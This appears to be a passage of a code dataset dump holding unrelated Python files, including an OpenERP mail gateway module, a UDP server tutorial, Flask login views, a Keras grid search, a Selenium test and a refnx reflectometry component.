self.pool.get('email.server.tools')\n msg_actions, body_data = mailgate_obj.msg_act_get(msg) \n data.update({\n 'description': body_data, \n })\n act = 
'do_'+default_act\n if 'state' in msg_actions:\n if msg_actions['state'] in ['draft','close','cancel','open','pending']:\n act = 'do_' + msg_actions['state']\n \n for k1,k2 in [('cost','planned_hours')]:\n try:\n data[k2] = float(msg_actions[k1])\n except:\n pass\n\n if 'priority' in msg_actions:\n if msg_actions['priority'] in ('1','2','3','4','5'):\n data['priority'] = msg_actions['priority']\n \n self.write(cr, uid, [id], data)\n getattr(self,act)(cr, uid, [id])\n return True\n\n def message_followers(self, cr, uid, ids, context=None):\n res = {}\n if isinstance(ids, (str, int, long)):\n select = [ids]\n else:\n select = ids\n for task in self.browse(cr, uid, select, context=context):\n user_email = (task.user_id and task.user_id.address_id and task.user_id.address_id.email) or False\n res[task.id] = [user_email]\n return res\n\n def msg_send(self, cr, uid, id, *args, **argv):\n return True\n \n def _history(self, cr, uid, cases, keyword, history=False, subject=None, email=False, details=None, email_from=False, message_id=False, attach=[], context=None):\n mailgate_pool = self.pool.get('mailgate.thread')\n return mailgate_pool.history(cr, uid, cases, keyword, history=history,\\\n subject=subject, email=email, \\\n details=details, email_from=email_from,\\\n message_id=message_id, attach=attach, \\\n context=context)\n \n def do_draft(self, cr, uid, ids, *args, **kwargs):\n res = super(project_tasks, self).do_draft(cr, uid, ids, *args, **kwargs)\n tasks = self.browse(cr, uid, ids)\n self._history(cr, uid, tasks, _('Draft'))\n return res\n \n def do_open(self, cr, uid, ids, *args, **kwargs):\n res = super(project_tasks, self).do_open(cr, uid, ids, *args, **kwargs)\n tasks = self.browse(cr, uid, ids)\n self._history(cr, uid, tasks, _('Open'))\n return res\n \n def do_pending(self, cr, uid, ids, *args, **kwargs):\n res = super(project_tasks, self).do_pending(cr, uid, ids, *args, **kwargs)\n tasks = self.browse(cr, uid, ids)\n self._history(cr, uid, tasks, 
_('Pending'))\n return res\n \n def do_close(self, cr, uid, ids, *args, **kwargs):\n res = super(project_tasks, self).do_close(cr, uid, ids, *args, **kwargs)\n tasks = self.browse(cr, uid, ids)\n for task in tasks:\n if task.state == 'done':\n self._history(cr, uid, tasks, _('Done'))\n return res\n \n def do_cancel(self, cr, uid, ids, *args, **kwargs):\n res = super(project_tasks, self).do_cancel(cr, uid, ids, *args, **kwargs)\n tasks = self.browse(cr, uid, ids)\n self._history(cr, uid, tasks, _('Cancel'))\n return res\n\nproject_tasks()\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"addons/project_mailgate/project_mailgate.py","file_name":"project_mailgate.py","file_ext":"py","file_size_in_byte":6158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"358163827","text":"# -*- coding: utf-8 -*-\n# @Time : 18-8-30 下午5:57\n# @Author : xmskf\n# @Email : 84887867@qq.com\n# @File : UDP_Server_test.py\n# @Software: PyCharm\n\n# TCP是建立可靠连接,并且通信双方都可以以流的形式发送数据。\n# 相对TCP,UDP则是面向无连接的协议。\n# 使用UDP协议时,不需要建立连接,只需要知道对方的IP地址和端口号,\n# 就可以直接发数据包。但是,能不能到达就不知道了。\n# 虽然用UDP传输数据不可靠,但它的优点是和TCP比,速度快,\n# 对于不要求可靠到达的数据,就可以使用UDP协议。\n# 我们来看看如何通过UDP协议传输数据。和TCP类似,\n# 使用UDP的通信双方也分为客户端和服务器。服务器首先需要绑定端口\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n# 绑定端口:\ns.bind(('127.0.0.1', 9999))\n\n# 创建Socket时,SOCK_DGRAM指定了这个Socket的类型是UDP。绑定端口和TCP一样,\n# 但是不需要调用listen()方法,而是直接接收来自任何客户端的数据:\n\nprint('Bind UDP on 9999...')\nwhile True:\n # 接收数据:\n data, addr = s.recvfrom(1024)\n print('Received from %s:%s.' % addr)\n s.sendto(b'Hello, %s!' 
% data, addr)\n\n# recvfrom()方法返回数据和客户端的地址与端口,\n# 这样,服务器收到数据后,直接调用sendto()就可以把数据用UDP发给客户端���\n\n\n# 小结\n# UDP的使用与TCP类似,但是不需要建立连接。\n# 此外,服务器绑定UDP端口和TCP端口互不冲突,\n# 也就是说,UDP的9999端口与TCP的9999端口可以各自绑定。","sub_path":"src/UDP_Server_test.py","file_name":"UDP_Server_test.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"577249808","text":"from flask_login import login_manager\nfrom app.models import User\nfrom flask.globals import session\nimport flask_login\nfrom app.auth.forms import LoginForm\nfrom flask import Blueprint\nfrom flask_login import login_user, logout_user, login_required\nfrom flask import render_template, redirect, request, url_for, flash\nfrom ..database import users_db\nfrom ..plugins import login_manager\n\nauth_bp = Blueprint('auth', __name__)\n\n\n@login_manager.user_loader\ndef load_user_auth(userName):\n data = users_db.get_user(userName)\n return User(data) if data is not None else data\n\n\ndef is_valid_cred_auth(user: User):\n return users_db.is_valid_cred(user.data['userName'], user.data['password'])\n\n\n@auth_bp.route('/login', methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n print(\"Logging in\")\n if form.validate_on_submit():\n user = load_user_auth(form.userName.data)\n print(user)\n if user is not None and is_valid_cred_auth(user):\n login_user(user, remember=True)\n next = request.args.get('next')\n if next is None or not next.startswith('/'):\n next = url_for('index')\n return redirect(next)\n flash('Invalid username or password.')\n return render_template('auth/login.jinja', form=form)\n\n\n@auth_bp.route(\"/logout\")\n@login_required\ndef logout():\n logout_user()\n flash('You have been logged out.')\n return redirect(url_for('index'))\n\n\n@auth_bp.route(\"/whoami\")\n@login_required\ndef whoami():\n return \"Your name is: \" + 
flask_login.current_user.data['userName']\n","sub_path":"app/auth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"439627347","text":"import os\nimport time\nimport shutil\n\nstart = time.time()\nfor fn in os.listdir('images/'):\n\tshutil.copy('images/'+fn, 'unique/')\nprint('Time to copy: ', time.time()-start)\n\ntotal_files = len(os.listdir('images/'))\nremoved = 0\n\nwith open('cor.txt') as f:\n\tlines = [ln.strip() for ln in f.readlines()]\n\tfor ln in lines:\n\t\targ = ln.split(' ')\n\t\tf1 = arg[0]\n\t\tf2 = arg[1]\n\t\tif len(arg)!=3:\n\t\t\tcr1 = float(arg[2][:-8])\n\t\t\tif cr1>0.8 and os.path.isfile('unique/'+f2):\n\t\t\t\tos.remove('unique/'+f2)\n\t\t\t\tprint('Deleting file:',f2,'with confidence',cr1)\n\t\t\t\tremoved +=1\n\t\t\tf1 = arg[2][-8:]\n\t\t\tf2 = arg[3]\n\t\t\tcr = float(arg[4])\n\t\telse:\n\t\t\tcr = float(arg[2])\n\t\tif cr>0.8 and os.path.isfile('unique/'+f2):\n\t\t\tos.remove('unique/'+f2)\n\t\t\tprint('Deleting file:',f2,'with confidence',cr)\n\t\t\tremoved+=1\n\nprint('Duplication: ', 100*removed/total_files,'%')\n","sub_path":"scripts/seperate.py","file_name":"seperate.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179289946","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nfor year in range(2015,2021):\r\n res = requests.get(\"https://search.daum.net/search?nil_suggest=btn&w=tot&DA=SBC&q={}%EB%85%84+%EC%98%81%ED%99%94%EC%88%9C%EC%9C%84\".format(year))\r\n res.raise_for_status\r\n soup = BeautifulSoup(res.text,\"lxml\")\r\n\r\n images = soup.find_all(\"img\",attrs={\"class\":\"thumb_img\"})\r\n\r\n for idx,image in enumerate(images):\r\n #print(image[\"src\"])\r\n image_url = image[\"src\"]\r\n if image_url.startswith(\"//\"):\r\n image_url = \"http:\" + image_url\r\n\r\n print(image_url)\r\n 
image_res = requests.get(image_url)\r\n image_res.raise_for_status()\r\n\r\n with open(\"movie_{}_{}.jpg\".format(year,idx+1),\"wb\") as f:\r\n f.write(image_res.content)\r\n\r\n if idx >= 4:\r\n break\r\n \r\n","sub_path":"pythonWorkspace/webscraping/11_daum_movies.py","file_name":"11_daum_movies.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224248931","text":"\"\"\"\n 测试复选框Checkbutton的用法\n author:Benjamin\n\"\"\"\n\nfrom tkinter import *\n\nchoices = [\"apple\",\n \"banana\",\n \"orange\",\n \"watermelon\"]\nv = []\n\nroot = Tk()\nroot.title(\"Text Checkbutton\")\nroot.geometry(\"300x150\")\n\nframe_choice = LabelFrame(root, text=\"You can get some fruits:\")\nframe_choice.pack(padx=10, pady=10)\n\nfor choice in choices:\n v.append(vars())\n Checkbutton(frame_choice, text=choice, variable=v[-1]).pack(anchor=W)\n\nmainloop()\n","sub_path":"text_tkinter/text_Checkbutton.py","file_name":"text_Checkbutton.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"43149123","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom pyqode.core import api\nfrom pyqode.core.api import Mode\nfrom pyqode.core.api import DelayJobRunner\nfrom pyqode.core.backend import NotConnected\nfrom pyqode.python.backend.workers import Definition, defined_names\nfrom pyqode.core.qt import QtCore\n\n\ndef _logger():\n return logging.getLogger(__name__)\n\n\nclass DocumentAnalyserMode(Mode, QtCore.QObject):\n \"\"\"\n This mode analyses the structure of a document (a tree of\n :class:`pyqode.python.backend.workers.Definition`.\n\n :attr:`pyqode.python.modes.DocumentAnalyserMode.document_changed`\n is emitted whenever the document structure changed.\n\n To keep good performances, the analysis task is run when the application is\n idle for more than 1 second (by default).\n \"\"\"\n #: Signal emitted when 
the document structure changed.\n document_changed = QtCore.Signal()\n\n def __init__(self, delay=1000):\n Mode.__init__(self)\n QtCore.QObject.__init__(self)\n self._jobRunner = DelayJobRunner(delay=delay)\n #: The list of results (elements might have children; this is actually\n #: a tree).\n self.results = []\n\n def on_state_changed(self, state):\n if state:\n self.editor.blockCountChanged.connect(self._on_line_count_changed)\n self.editor.new_text_set.connect(self._run_analysis)\n else:\n self.editor.blockCountChanged.disconnect(\n self._on_line_count_changed)\n self.editor.new_text_set.disconnect(self._run_analysis)\n\n def _on_line_count_changed(self, e):\n self._jobRunner.request_job(self._run_analysis)\n\n def _run_analysis(self):\n if self.editor and self.editor.toPlainText() and self.editor.file:\n request_data = {\n 'code': self.editor.toPlainText(),\n 'path': self.editor.file.path,\n 'encoding': self.editor.file.encoding\n }\n try:\n self.editor.backend.send_request(\n defined_names, request_data,\n on_receive=self._on_results_available)\n except NotConnected:\n QtCore.QTimer.singleShot(100, self._run_analysis)\n else:\n self.results = []\n self.document_changed.emit()\n\n def _on_results_available(self, status, results):\n if results:\n results = [Definition().from_dict(ddict) for ddict in results]\n self.results = results\n if self.results is not None:\n _logger().debug(\"Document structure changed\")\n self.document_changed.emit()\n\n @property\n def flattened_results(self):\n \"\"\"\n Flattens the document structure tree as a simple sequential list.\n \"\"\"\n ret_val = []\n for d in self.results:\n ret_val.append(d)\n for sub_d in d.children:\n nd = Definition(sub_d.name, sub_d.icon, sub_d.line,\n sub_d.column, sub_d.full_name)\n nd.name = \" \" + nd.name\n nd.full_name = \" \" + nd.full_name\n ret_val.append(nd)\n return 
ret_val\n","sub_path":"pyqode/python/modes/document_analyser.py","file_name":"document_analyser.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641818721","text":"import pandas as pd\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import GridSearchCV\n\nprevisores = pd.read_csv('entradas-breast.csv')\nclasse = pd.read_csv('saidas-breast.csv')\n\ndef criarRede(neurons, drop_rate, lr_rate, clipvalue_rate):\n classificador = Sequential()\n classificador.add(Dense(units = neurons, activation = 'relu', \n kernel_initializer = 'normal', input_dim = 30))\n classificador.add(Dropout(drop_rate))\n classificador.add(Dense(units = neurons, activation = 'relu', \n kernel_initializer = 'normal'))\n classificador.add(Dropout(drop_rate))\n classificador.add(Dense(units = neurons, activation = 'relu', \n kernel_initializer = 'normal'))\n classificador.add(Dropout(drop_rate))\n classificador.add(Dense(units = 1, activation = 'sigmoid'))\n otimizador = keras.optimizers.Adam(lr = lr_rate, decay = 0.0001, clipvalue = clipvalue_rate)\n classificador.compile(optimizer = otimizador, loss = 'binary_crossentropy',\n metrics = ['binary_accuracy'])\n return classificador\n\nclassificador = KerasClassifier(build_fn = criarRede)\nparametros = {'batch_size': [10, 20, 30, 50],\n 'epochs': [100, 120],\n 'neurons': [8, 16, 32],\n 'drop_rate': [0.1, 0.2, 0.3],\n 'lr_rate': [0.001, 0.005],\n 'clipvalue_rate': [0.3, 0.5, 0.6]}\n\ngrid_search = GridSearchCV(estimator = classificador,\n param_grid = parametros,\n scoring = 'accuracy',\n cv = 5)\ngrid_search = grid_search.fit(previsores, classe)\nmelhores_parametros = grid_search.best_params_\nmelhor_precisao = grid_search.best_score_","sub_path":"1 - Redes Neurais Artificiais/4 - Classificação 
binária/Tarefa1-tuning.py","file_name":"Tarefa1-tuning.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"285371019","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom basetest import SeleniumTestCase\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nchromedriver_path = 'C:/Users/laure/bin/chromedriver.exe'\nbrowser = webdriver.Chrome(ChromeDriverManager().install())\n\n#User hears about a blog website they want to visit. They head over to its homepage.\nbrowser.get('https://laurenalie.pythonanywhere.com/')\n\n#User navigates to Featured page\ndef goToFeatured():\n menu = browser.find_element_by_xpath(\"//i[@class='fas fa-ellipsis-v']\")\n browser.implicitly_wait(2)\n browser.execute_script(\"arguments[0].click();\", menu) \n try:\n featured = browser.find_element_by_link_text(\"Featured\")\n browser.execute_script(\"arguments[0].click();\", featured)\n current = browser.current_url\n assert current == \"https://laurenalie.pythonanywhere.com/#featured\"\n except NoSuchElementException:\n print(\"failed to go to Featured page\")\n pass\n\n#User wants to see all featured posts so flicks through carousel (both left and right)\n\ndef checkCarouselMovement():\n #Check right movement\n for i in range(3):\n next = browser.find_element_by_xpath('//a[@class=\"right carousel-control\"]')\n browser.execute_script(\"arguments[0].click();\", next)\n browser.implicitly_wait(3)\n #Check left movement\n for i in range(3):\n prev = browser.find_element_by_xpath('//a[@class=\"left carousel-control\"]')\n browser.execute_script(\"arguments[0].click();\", prev)\n browser.implicitly_wait(3)\n \n\n#User wants to check out one of the featured posts so clicks on it to read more.\n\ndef readFeatured():\n 
#Click on post\n try:\n image = browser.find_element_by_tag_name(\"img\")\n browser.execute_script(\"arguments[0].click();\", image) \n current = browser.current_url\n assert \"https://laurenalie.pythonanywhere.com/post\" in current\n except NoSuchElementException:\n print(\"failed to go to post by clicking on image\")\n\n #User returns to Home by clicking on home icon\n try:\n home = browser.find_element_by_xpath(\"//i[@class='fa fa-home']\")\n browser.execute_script(\"arguments[0].click();\", home) \n current = browser.current_url\n assert current == \"https://laurenalie.pythonanywhere.com/\"\n except NoSuchElementException:\n print(\"failed to return to homepage\")\n\n\n \n\n\ngoToFeatured()\ncheckCarouselMovement()\nreadFeatured()\nbrowser.quit()\nprint(\"Successfully navigated Featured Posts\")","sub_path":"blog/tests/featured_test.py","file_name":"featured_test.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"388807319","text":"import numpy as np\r\n\r\nfrom refnx.reflect import Structure, Component\r\nfrom refnx.analysis import Parameter, Parameters, possibly_create_parameter\r\nfrom scipy import special\r\nimport time\r\nfrom methodtools import lru_cache #functools doesn't work for classmethods?\r\n\r\nEPS = np.finfo(float).eps\r\n\r\n\r\nclass VFP(Component):\r\n \"\"\"\r\n A hack of refnx's spline component.\r\n \r\n ### how does this work? 
###\r\n \r\n In ReflectModel, the reflectivity function is used to calculate the generative for a given set of parameters.\r\n The generative is used when fitting a dataset, when carrying out posterior sampling & when estimating the model evidence.\r\n \r\n The reflectivity function requires a slab representation \r\n (an array of slab (shape = 2+N, 4 where N is number of layers) parameters - thicknesses, roughnesses etc) \r\n of the structure.\r\n \r\n This slab representation is returned by the structure.slab() method, \r\n which uses the slab method of each component within a structure to return a concatenated array of slabs.\r\n \r\n This means, the VFP component needs a slab method which will return an array of microslabs to ReflectModel.\r\n In the slab method we use the __call__ method of the VFP component to do the calculation.\r\n \r\n Here, the __call__ method of Spline has been altered to calculate\r\n a new array of distances across the interface (zeds), and then calculate\r\n volume fractions profiles for all layers given the thickness and roughness parameters.\r\n SLDs for each layer are calculated using the SLD parameters and the\r\n calculated volume fractions.\r\n These are then added together to create an array of SLDs the same length\r\n as the zeds array.\r\n These sld values are then returned in the __call__ method, which feeds through\r\n to the slabs sld.\r\n No interpolation occurs in this class.\r\n The microslabs are 0.5 Å each, as defined by self.max_delta_z.\r\n \r\n Parameters\r\n ----------\r\n extent : float or Parameter\r\n Total length of volume fraction profiles\r\n SLDs : array of floats or Parameters \r\n Values of SLDs\r\n thicknesses : tuple of floats or Parameters\r\n Thicknesses of layers - these are used to determine the width of the volume fraction profiles.\r\n roughnesses : tuple of floats or Parameters\r\n Roughnesses of layers - these are used to determine the width of the volume fraction profiles.\r\n contrast : 
string\r\n string used to select which SLDs are used to calculate the scattering length density profile.\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n extent,\r\n SLDs,\r\n thicknesses,\r\n roughnesses,\r\n contrast,\r\n ):\r\n super().__init__() #inherit the Component class.\r\n self.SLDs = SLDs\r\n self.thicknesses = thicknesses #tuples for hashing...\r\n self.roughnesses = roughnesses\r\n self.contrast = contrast\r\n self.name = \"\"\r\n \r\n #hard code in some other values\r\n self.max_delta_z = 0.5\r\n \r\n #select contrasts to use\r\n if self.contrast == 'dd_d2o_up':\r\n self.SLDs = np.array([SLDs[i] for i in [0, 1, 2, 4, 7, 9]])\r\n elif self.contrast == 'dd_d2o_down':\r\n self.SLDs = np.array([SLDs[i] for i in [0, 1, 3, 5, 7, 9]])\r\n elif self.contrast == 'dd_h2o_up':\r\n self.SLDs = np.array([SLDs[i] for i in [0, 1, 2, 4, 6, 10]])\r\n elif self.contrast == 'dd_h2o_down':\r\n self.SLDs = np.array([SLDs[i] for i in [0, 1, 3, 5, 6, 10]])\r\n elif self.contrast == 'hd_d2o_up':\r\n self.SLDs = np.array([SLDs[i] for i in [0, 1, 2, 4, 8, 11]])\r\n elif self.contrast == 'hd_d2o_down':\r\n self.SLDs = np.array([SLDs[i] for i in [0, 1, 3, 5, 8, 11]])\r\n\r\n self.extent = possibly_create_parameter(\r\n extent, name=\"%s - VFP extent\", units=\"Å\"\r\n )\r\n \r\n #initialise the SLDs and zeds.\r\n self.vs = self.create_vs()\r\n \r\n self.dz = self.get_dzs(self.extent.value, self.max_delta_z)\r\n\r\n @lru_cache(maxsize=2)\r\n @classmethod\r\n def get_dzs(cls, ex, mxdz):\r\n \"\"\"\r\n This function finds the thickness of each microslice, \r\n while also finding the thickness of any larger slab.\r\n \"\"\"\r\n def consecutive(indic, stepsize=1): #internal func for finding consecutive indices.\r\n \"\"\"\r\n Splits indic into sub arrays where the difference between neighbouring units in indic is not 1.\r\n \"\"\"\r\n return np.split(indic, np.where(np.diff(indic) != stepsize)[0]+1)\r\n \r\n delta_step = ex/(cls.knots-1) #gives the thickness of the microslabs (approx 
0.5 Å).\r\n \r\n if not cls.ind[0].any(): #if there are no indices of where volume fraction is approx equal, all slab thicknesses = delta_step.\r\n dzs = np.ones(cls.knots)*delta_step\r\n \r\n else:\r\n indexs = consecutive(np.array(cls.ind)[0]) #list of n arrays (n is the number of zones where there is little difference)\r\n \r\n indexs_diffs = [j[-1]-j[0] for j in indexs] #find length of each zone and return in a list.\r\n indexs_starts = [j[0] for j in indexs] #where does each zone start?\r\n indexs_ends = [j[-1] for j in indexs] #where does each zone start?\r\n \r\n index_gaps = np.array([j - indexs_ends[i-1] for i, j in enumerate(indexs_starts) if i > 0])\r\n \r\n new_knots = (cls.knots) - (np.array(indexs_diffs).sum()+len(indexs)) #number of knots is now reduced.\r\n dzs = np.empty(int(new_knots)) #init an array for collecting dz values.\r\n new_indexs_starts = [indexs_starts[0] + index_gaps[:i].sum() for i, j in enumerate(indexs)]\r\n \r\n dzs = np.ones(new_knots)*delta_step #make all values delta step.\r\n if len(new_indexs_starts) > 1:\r\n for i, j in enumerate(new_indexs_starts): #find places where delta step needs to be altered.\r\n dzs[j] = ((indexs_diffs[i]+1)*delta_step)+dzs[j-1]\r\n else:\r\n dzs[int(new_indexs_starts[0])] = ((indexs_diffs[0]+1)*delta_step)+dzs[int(new_indexs_starts[0]-1)] #alter dz in the one place required.\r\n return dzs\r\n \r\n def get_x_and_y_scatter(self):\r\n \"\"\" \r\n Function that returns the middle z and SLD of each microslab.\r\n \"\"\"\r\n y = np.array([float(i) for i in self.create_vs()])\r\n x = np.delete(np.array([float(i) for i in self.get_zeds(self.roughnesses, self.thicknesses)]), self.indices)\r\n return x, y\r\n \r\n @classmethod\r\n def get_zeds(cls, rough, thick):\r\n \"\"\"\r\n Calculate an array of zeds for volume fraction calculations.\r\n \"\"\"\r\n cls.knots = int(cls.ex/cls.mxdz) #number of points to calculate z at.\r\n zstart = -5 - 4 * rough[0] #where does z start?\r\n zend = 5 + np.cumsum(thick)[-1] 
+ 4 * rough[-1] #where does z end?\r\n zed = np.linspace(float(zstart), float(zend), num=cls.knots) #now return the array.\r\n return zed\r\n \r\n @classmethod\r\n def get_erf(cls, layer_choice, loc, rough, thick):\r\n \"\"\"\r\n Calculate 1-F_{i} for a given layer (defined by layer_choice)\r\n \"\"\"\r\n erf = (1-np.array([0.5*(1 + special.erf((float(i)-loc[layer_choice])/\r\n float(rough[layer_choice])/np.sqrt(2))) for i in cls.get_zeds(rough, thick)]))\r\n return erf \r\n \r\n @lru_cache(maxsize=2)\r\n @classmethod\r\n def get_vfs(cls, rough, thick, ex, mxdz):\r\n \"\"\"\r\n This function creates the volume fraction profile for a given set of thicknesses, & roughnesses.\r\n It is a classmethod so that the result is shared between objects of the same class.\r\n This is useful as the different contrasts will share the same volume fraction profile\r\n for a given set of thickness and roughness parameters.\r\n As such, we can use the lru_cache capability to store the volume fraction profile so that\r\n it only needs calculating once per set of contrasts.\r\n \"\"\"\r\n rough = np.array(rough)\r\n thick = np.array(thick)\r\n loc = np.cumsum(thick)\r\n #share the total length of vf profile & the microslab thickness across the class\r\n cls.ex = ex\r\n cls.mxdz = mxdz\r\n \r\n #hard code in the layers we want\r\n #create a vf array of length of N layers + 2.\r\n #the integer supplied in the brackets is the layer_choice. 
0 is fronting.\r\n #follows Equation S9 in SI, although note that cls.get_erf(i, loc, rough, thick) = 1-F_{i}\r\n vfs = np.array([cls.get_erf(0, loc, rough, thick)*cls.get_erf(1, loc, rough, thick), #Si\r\n (1-cls.get_erf(0, loc, rough, thick))*cls.get_erf(1, loc, rough, thick), #SiO2\r\n (1-cls.get_erf(1, loc, rough, thick))*cls.get_erf(2, loc, rough, thick), #Fe\r\n (1-cls.get_erf(2, loc, rough, thick))*cls.get_erf(3, loc, rough, thick), #FeOx\r\n (1-cls.get_erf(2, loc, rough, thick))*(1-cls.get_erf(3, loc, rough, thick))*cls.get_erf(4, loc, rough, thick), #GMO\r\n (1-cls.get_erf(2, loc, rough, thick))*(1-cls.get_erf(3, loc, rough, thick))*(1-cls.get_erf(4, loc, rough, thick))]) #Solv\r\n \r\n #There may be portions of a layer's vf profile that sits above 0 (at say 1) for an extended length.\r\n #Therefore, we can merge these microslabs into one to speed up calculations.\r\n cls.ind = np.nonzero((np.abs(np.diff(vfs[2])) < 1e-5) & (vfs[2][:-1] > 0.5)) #look for insignificant differences in Fe vf, when vf is > 0.5.\r\n reduced_vfs = np.delete(vfs, cls.ind, 1)\r\n return reduced_vfs, cls.ind\r\n \r\n def get_slds(self):\r\n \"\"\"\r\n This function returns the total sld for a given contrast.\r\n \r\n The thicknesses and roughnesses are used to generate the volume fraction profile\r\n in combination with the total length of the volume fraction profile and the microslab width.\r\n \r\n After, the volume fraction profiles is multiplied by the sld values to create a SLD profile for a given contrast.\r\n \"\"\"\r\n \r\n #get floats of parameters so hashing recognition works.\r\n thicks = tuple(np.array([float(i) for i in self.thicknesses]))\r\n roughs = tuple(np.array([float(i) for i in self.roughnesses]))\r\n \r\n volfracs, self.indices = self.get_vfs(roughs, thicks, self.extent.value, self.max_delta_z)\r\n sld_values = [float(i) for i in self.SLDs]\r\n \r\n #Equation S11 in the SI.\r\n self.sld_list = volfracs.T*sld_values\r\n tot_sld = np.sum(self.sld_list, 1)\r\n 
return tot_sld\r\n \r\n def create_vs(self): #creates parameters that are constrained to self.get_slds()\r\n slds_arr = self.get_slds()\r\n return slds_arr\r\n \r\n def __repr__(self):\r\n s = (\"VFP({extent!r}, {SLDs!r}, {thicknesses!r}, {roughnesses!r}, {contrast!r}\")\r\n return s.format(**self.__dict__)\r\n\r\n def __call__(self):\r\n \"\"\"\r\n Here we get the slds from the volume fractions,\r\n then we find the average slds between consecutive points.\r\n \"\"\"\r\n #recalculate slds.\r\n #caching is not shared between processes.\r\n self.vs = self.create_vs() #this returns the SLD profile for a given contrast.\r\n self.dz = self.get_dzs(self.extent.value, self.max_delta_z) #returns the thickness of each slab.\r\n \r\n average_slds = 0.5*np.diff(self.vs)+self.vs[:-1]\r\n return_slds = np.append(average_slds, self.vs[-1])\r\n return return_slds, self.dz\r\n\r\n\r\n @property\r\n def parameters(self):\r\n p = Parameters(name=self.name)\r\n p.extend([self.extent])\r\n return p\r\n \r\n def p_equivs(self):\r\n #as slds and dzs are not automatically returned as parameters\r\n #use this function to return the parameter values after fitting.\r\n dzs_par_list = Parameters(name='dzs')\r\n vs_par_list = Parameters(name='slds')\r\n for i, j in enumerate(self.dz):\r\n pdz = Parameter(value=j)\r\n dzs_par_list.append(pdz)\r\n pvs = Parameter(value=self.vs[i])\r\n vs_par_list.append(pvs)\r\n p = Parameters(name=self.name)\r\n p.extend([self.extent, dzs_par_list, vs_par_list])\r\n return p\r\n \r\n def vfs_for_display(self):\r\n \"\"\"\r\n Useful function for displaying volume fractions. 
\r\n Use in conjunction with first output of get_x_and_y_scatter to plot.\r\n \"\"\"\r\n thicks = tuple(np.array([float(i) for i in self.thicknesses]))\r\n roughs = tuple(np.array([float(i) for i in self.roughnesses]))\r\n \r\n volfracs = self.get_vfs(roughs, thicks, self.extent.value, self.max_delta_z)[0]\r\n \r\n return volfracs\r\n \r\n def logp(self):\r\n return 0\r\n\r\n\r\n def slabs(self, structure=None):\r\n \"\"\"\r\n Slab representation of the spline, as an array\r\n\r\n Parameters\r\n ----------\r\n structure : refnx.reflect.Structure\r\n The Structure hosting this Component\r\n \"\"\"\r\n if structure is None:\r\n raise ValueError(\"Spline.slabs() requires a valid Structure\")\r\n \r\n slds, thicks = self()\r\n slabs = np.zeros((len(thicks), 5))\r\n slabs[:, 0] = thicks\r\n slabs[:, 1] = slds\r\n return slabs","sub_path":"NR/GMO_water/vfp_M1.py","file_name":"vfp_M1.py","file_ext":"py","file_size_in_byte":13537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"137764174","text":"__author__ = 'nsheridan'\n\nimport pickle\nf = open(r'C:\\temp\\offices.pkl', 'rb')\nebrd_offices = pickle.load(f)\nf.close()\n\nclass Office: # Note that classes should always have a name in title case (i.e. \"Office\" not \"office\")\n \"\"\"\n Represents a single production entity on the network\n attributes:\n location (city of origin)\n country (country of origin)\n locCode (three letter office code used in device nomenclature)\n vpnNum (office number typically represented in second octect)\n timeZone (offset from UTC)\n linkNum (number of links)\n wanSpeed (bit rate of local tail circuit)\n\n Note that this class has no methods!\n \"\"\"\n\n def __init__(self, office):\n \"\"\"\n\n Define constructors for Class\n\n - This a accessible outside of the Class. 
For example, say we instantiated a class \"ashgabat\",\n we could access the list ['Turkmenistan', 'ASB', '220', '5', '1', '512'] by calling:\n\n ashgabat.office_details\n\n \"\"\"\n self.office = office # Expect a string, e.g. \"Ashgabat\" (note this just a string!)\n self.office_details = ebrd_offices[office] # This is a list relating to the office, i.e.\n # if office = \"Ashgabat\" then this would equal\n # ['Turkmenistan', 'ASB', '220', '5', '1', '512']\n\n self.country = self.office_details[0]\n self.loc_code = self.office_details[1]\n self.vpn_num = self.office_details[2]\n self.time_zone = self.office_details[3]\n self.link_num = self.office_details[4]\n self.wan_speed = self.office_details[5]\n\n '''\n Note that the \"self\" part indicates the object you're creating. For example, if you did this:\n\n ashgabat = Office(\"Ashgabat\")\n\n ... this would create the object \"ashgabat\". This is the \"self\" part, so if you wanted to know the\n location you would then call:\n\n ashgabat.location\n\n ... which would return the value \"Turkmenistan\". Think of the \"self\" part as being the template\n which is replaced with the string specified (in this case \"ashgabat\", *not* \"Ashgabat\" because\n this is the key to the dictionary!).\n\n '''\n\n\n def show_details(self):\n print('\\n')\n display_string = \"Showing the object details \" + str(self) + \" based on \" + self.office\n print(len(display_string) * '#')\n print(display_string)\n print(len(display_string) * '#')\n print('\\n')\n # ... 
